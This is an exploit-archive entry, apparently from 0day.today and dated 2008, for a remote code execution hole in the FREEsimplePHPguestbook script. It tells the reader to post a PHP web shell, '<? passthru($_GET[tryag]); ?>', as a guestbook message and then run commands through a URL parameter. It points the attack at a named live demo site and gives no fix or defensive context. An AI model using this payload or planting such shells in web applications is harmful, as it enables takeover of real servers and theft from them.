id: 4146
date: 11/10/2008
title: FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vuln
author: GoLd_M
cves: 

==========================================================================
FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability 
==========================================================================


FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability 
Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip
Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php
Exploit :
         Go http://www.sanusart.com/php/test/guestbook/guestbook.php
In  ->> Name (required): Write ->> Mahmood
In  ->> Message: Write ->> <? passthru($_GET[tryag]); ?>

After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id



#  0day.today [2023-03-23]  #